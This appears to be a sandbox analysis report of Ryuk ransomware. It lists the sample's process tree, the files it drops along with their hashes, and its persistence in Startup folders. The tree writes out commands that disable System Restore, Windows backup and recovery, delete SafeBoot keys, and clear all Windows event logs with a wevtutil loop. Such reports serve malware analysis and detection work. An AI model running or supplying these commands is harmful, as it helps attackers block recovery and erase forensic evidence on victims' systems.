    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
- [level 2] C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
- [level 3] C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wevtutil.exe el
- [level 4] C:\Windows\system32\wevtutil.exe
  wevtutil.exe el
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "AMSI/Debug"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "AirSpaceChannel"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Analytic"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Application"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "DirectShowFilterGraph"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "DirectShowPluginControl"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Els_Hyphenation/Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "EndpointMapper"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "FirstUXPerf-Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "ForwardedEvents"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "General Logging"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "HardwareEvents"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "IHM_DebugChannel"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Internet Explorer"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Key Management Service"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationFrameServer"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MedaFoundationVideoProc"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MedaFoundationVideoProcD3D"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationAsyncWrapper"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationContentProtection"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationDS"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationDeviceProxy"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationMP4"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationMediaEngine"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPerformance"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPerformanceCore"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPipeline"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPlatform"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationSrcPrefetch"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Admin"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Debug"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Operational"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-IE/Diagnostic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
  - Clears Windows event logs
- [level 3] C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
  - Clears Windows event logs
- [level 1] C:\Windows\system32\reg.exe
  reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
- [level 1] C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
  Filesize: 1KB
  MD5: f69127370e1f1aede86e881dd446f6aa
  SHA1: 65298f80e3b97f59ea45179463ab9c5cc3ee9337
  SHA256: da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
  SHA512: 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
  Filesize: 885KB
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
- C:\ProgramData\RYUKID
  Filesize: 8B
  MD5: 85462c5c76a1f9effd9d24af445182da
  SHA1: 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
  SHA256: 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
  SHA512: 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5
- C:\ProgramData\RyukReadMe.html
  Filesize: 152B
  MD5: a641bf8ac8307aad57ecab53872e67db
  SHA1: 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
  SHA256: 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
  SHA512: 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4
- C:\ProgramData\RyukReadMe.txt
  Filesize: 1KB
  MD5: f69127370e1f1aede86e881dd446f6aa
  SHA1: 65298f80e3b97f59ea45179463ab9c5cc3ee9337
  SHA256: da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
  SHA512: 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
- C:\ProgramData\hrmlog1
  Filesize: 2KB
  MD5: cf30a97d06523d5819b46c7db7b85129
  SHA1: e8022ad32c76df2df6eae5118b45b96fd59e8453
  SHA256: b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
  SHA512: 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
- C:\ProgramData\hrmlog2
  Filesize: 292B
  MD5: e14553b25f8951635bc37c90beffecc0
  SHA1: 60d9f6ff88506a9fcd36342fa2698025e990a673
  SHA256: 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
  SHA512: 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
- C:\ProgramData\ryuk.exe
  Filesize: 885KB
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
- C:\Users\Admin\AppData\Local\Temp\RYUKID
  Filesize: 8B
  MD5: 85462c5c76a1f9effd9d24af445182da
  SHA1: 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
  SHA256: 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
  SHA512: 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5
- C:\Users\Admin\AppData\Local\Temp\hrmlog1
  Filesize: 2KB
  MD5: cf30a97d06523d5819b46c7db7b85129
  SHA1: e8022ad32c76df2df6eae5118b45b96fd59e8453
  SHA256: b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
  SHA512: 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
- C:\Users\Admin\AppData\Local\Temp\hrmlog2
  Filesize: 292B
  MD5: e14553b25f8951635bc37c90beffecc0
  SHA1: 60d9f6ff88506a9fcd36342fa2698025e990a673
  SHA256: 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
  SHA512: 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
  Filesize: 885KB
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42